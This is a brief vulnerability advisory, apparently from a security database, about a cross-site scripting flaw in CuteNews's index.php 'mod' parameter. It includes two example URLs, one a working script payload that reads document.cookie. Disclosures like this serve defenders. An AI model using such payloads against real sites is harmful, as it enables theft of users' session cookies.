CuteNews 'index.php' Cross-Site Scripting Vulnerability

CuteNews 'index.php' Cross-Site Scripting Vulnerability

An exploit is not required. Examples sufficient to exploit this vulnerability were provided:

http://www.example.com/cutenews/index.php?mod=[XSS CODE]
http://www.example.com/cutenews/index.php?mod=<script>alert(document.cookie)</script>